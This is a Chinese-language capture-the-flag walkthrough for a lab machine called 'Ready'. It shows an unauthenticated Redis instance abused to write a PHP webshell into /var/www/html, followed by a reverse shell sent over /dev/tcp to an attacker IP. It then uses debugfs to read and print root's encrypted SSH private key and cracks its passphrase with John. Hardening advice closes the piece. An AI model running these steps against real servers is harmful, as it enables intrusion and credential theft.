# 靶场搭建
下载:Ready
网络模式: NAT,靶机 IP: 192.168.1.146
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA) | |
| 256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA) | |
|_ 256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519) | |
80/tcp open http Apache httpd 2.4.54 ((Debian)) | |
|_http-title: Apache2 Test Debian Default Page: It works | |
|_http-server-header: Apache/2.4.54 (Debian) | |
6379/tcp open redis Redis key-value store 6.0.16 | |
8080/tcp open http Apache httpd 2.4.54 ((Debian)) | |
|_http-open-proxy: Proxy might be redirecting requests | |
|_http-title: Apache2 Test Debian Default Page: It works | |
|_http-server-header: Apache/2.4.54 (Debian) |
┌──(root㉿kali)-[~] | |
└─# redis-cli -h 192.168.1.146 | |
192.168.1.146:6379> config set dir /var/www/html | |
OK | |
192.168.1.146:6379> config set dbfilename shell.php | |
OK | |
192.168.1.146:6379> set shell "<?php system($_GET['c']); ?>" | |
OK | |
192.168.1.146:6379> save | |
OK |
反弹 shell: http://192.168.1.146:8080/shell.php?c=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.1.129%2f4444+0%3e%261%22
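拿到了 shell(从后面的提示符看,当前用户为 ben)。之所以能写入 webshell,是因为 Redis 未启用认证即可远程连接,并且其进程对 Web 目录 /var/www/html 有写权限;加固时应为 Redis 设置认证、限制监听地址,并以无权写入 Web 目录的低权限账户运行。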
# 提权
通过 debugfs 直接打开磁盘设备 /dev/sda1(只是读取块设备,并非真正挂载),可以绕过文件权限,直接读取到 root 的 SSH 私钥 /root/.ssh/id_rsa:
ben@ready:/tmp$ df -h | |
Filesystem Size Used Avail Use% Mounted on | |
/dev/sda1 6.9G 1.5G 5.1G 23% / | |
udev 473M 0 473M 0% /dev | |
tmpfs 489M 0 489M 0% /dev/shm | |
tmpfs 98M 588K 98M 1% /run | |
tmpfs 5.0M 0 5.0M 0% /run/lock | |
ben@ready:/tmp$ which debugfs | |
/usr/sbin/debugfs | |
ben@ready:/tmp$ /usr/sbin/debugfs /dev/sda1 | |
debugfs 1.46.2 (28-Feb-2021) | |
debugfs: cat /root/.ssh/id_rsa | |
-----BEGIN RSA PRIVATE KEY----- | |
Proc-Type: 4,ENCRYPTED | |
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE | |
tTN5G66QaZHsjOSYG8pFEQqUJUC4lw+WzHs3hbml1+zuLPmnDvUapYFB/4IgQNG2 | |
jp1tebAwENVz/CdS3paB60NB9uosYXHa60Sbi7a31Ej6QqH10UnN/NROSEhqZkt+ | |
dUcQspoDJIvHyvdhm4lIVizfvw1i9epxY+aB9W7vscpN1HAq37WdOn62nnEccLRs | |
wShZgOeOLTUo5j+C0oQZDi11ZJxEFiwwCFkOqZ+ZEQgshQqgG8PjMvedwuQcFjpN | |
wgFyQl0ZzGTzaj1iZntc/7G1/9WqXyk3IkpICucALCaSlCZ3Oh0kJd12W27vTKdO | |
kBpXNU8cgjc+jbIKveFZe6+ZuMwr3Lb9p+f+m7ktcTk/AFxSObuFnHBZN52VE/F4 | |
lVK8vR7Om8qg34REgbvkmrBttg7x4AzUsTZ1WPPJqu3VS0SGVyq8vkpA2ngHmMBC | |
h3Ca0Xjua55GzCFBGePrQmqOd8jKZ0W6HBfCQyGB/dGg57mKNQy1OSIR4XtFYDYN | |
wNGTgr4KPebWf1CYRg2nleu3DD3sezutvoVMLJdzoeaLrCPX0pdfEhBase7n72Gy | |
Q6zqrk07p5GQeuL3tfhBsbHqgK899IMPr2VZPwvaoibDF66UJ1unfEXiPzTTHDo9 | |
5MTR1GK7HYnmtypx3OpCDJMFGwaJgx+o944cxX9DQ63pgwx1R34RoQRfIgqUUrsG | |
NhEkLvrYFMnlK/dSmouuNFvd868zBlMByQyVYoepyHGhsGDuAP4Mhx7L1Gbj4dRS | |
dMgfgLN0lM0G+P9QvmmX7TuH1MU1IIfZZw9dCfdUqVVKyegA2RQ7fZG9D8o3l1J0 | |
bIj0VJE7ykqqZEndzgBGRw3bEu3/OKpJM2UFqr/pPlu1w1bVIzHrTPNI5nk6dm77 | |
n/TqwSgU2EQDWK88Z8TORZvuoNA3FelyzxCfRC2HLv0+QrVbyY7dLf3oLH0Zq+gK | |
1OYVrTKbe4pu0J2R7jZw20pLWeEZPuSE3RmVwcSsVzwb6dBk5rMkwCE5gG1qNh1U | |
koCqtHzXveisx5I7KrvBj5RTaK/aPX/v8BS/oh8AmiQr2Pqq9K+aQScP2XYh691x | |
yfVoFGJrZMcG5VD3QxrgWamgcHhug2LotpRbxjc777uK/muI9rUSQLYC06H2Cdf/ | |
kRUH9Ohf3ZrVXpcCMhuCBbOxYBr+TAGjwJIBAYuFMBqhZ4gyaZhxJMCBhQOJHy6c | |
xR2cUdOAUh9lY40/o0Pwf+5GWiX2u5KmzcZ9iLdJ4NtgYiYMjGMe+0G37PdCXJvG | |
D+VsowoqCou916TMZUKpYSkzj8q3GLSib6CumVzKDesMLaYiZTOd1ShBqTlYjorp | |
Dlo5vrgUFk17OS8n0gtQuavBvN+2aM6gMOgiJrXfeLjzPGoY2ypHyNlbp/JI0/Y+ | |
DfE+2kNqriAlvZps1mllIKITk1wNPQ3PVuBW9DkvrSUW7Ye+oMK3WoiQkY4qyu+2 | |
pN0okmXmT5ygTq9KBQUEtjU8RnY27y34nYwCQus0HCA+FfRoxDbJYl0sN2g/Mzjq | |
PWVlSZLxzcya8sxPBA8gto3H5BxFnTxRXbCBTjTL09imi3QMl9K1emUlG8rSpBsI | |
-----END RSA PRIVATE KEY----- |
┌──(root㉿kali)-[~/Downloads] | |
└─# ssh2john id > id_rsa.hash | |
┌──(root㉿kali)-[~/Downloads] | |
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) | |
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes | |
Cost 2 (iteration count) is 2 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
shelly (id) | |
1g 0:00:00:00 DONE (2024-05-23 09:02) 50.00g/s 49600p/s 49600c/s 49600C/s marie1..babyface | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
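拿到私钥的口令(passphrase): shelly。该私钥使用旧式 PEM 加密(DES-EDE3-CBC,John 输出显示 KDF/cipher 为 MD5/3DES),口令又在 rockyou 字典中,所以瞬间就被破解。
用该私钥和口令通过 ssh 连上去,拿到 root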
# 小结
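这里用到的 debugfs 是 e2fsprogs 提供的用户空间工具,用于调试 ext2/ext3/ext4 文件系统。它直接打开块设备(本例为 /dev/sda1),可以在运行时查看甚至修改文件系统的内部状态和结构,因此不受已挂载文件系统上文件权限的限制;这对于诊断文件系统问题和了解文件系统的运行方式非常有用。注意它与内核的 debugfs 伪文件系统同名但不是一回事:后者通常挂载在 /sys/kernel/debug/ 路径下,供文件系统驱动程序和其他内核模块创建、删除和管理调试信息文件。本例能够提权,是因为普通用户 ben 对 /dev/sda1 有读取权限(常见原因是该用户属于 disk 组,文中没有展示 id 输出,待确认)。防护上应避免让普通用户读取块设备,并为 SSH 私钥设置高强度口令。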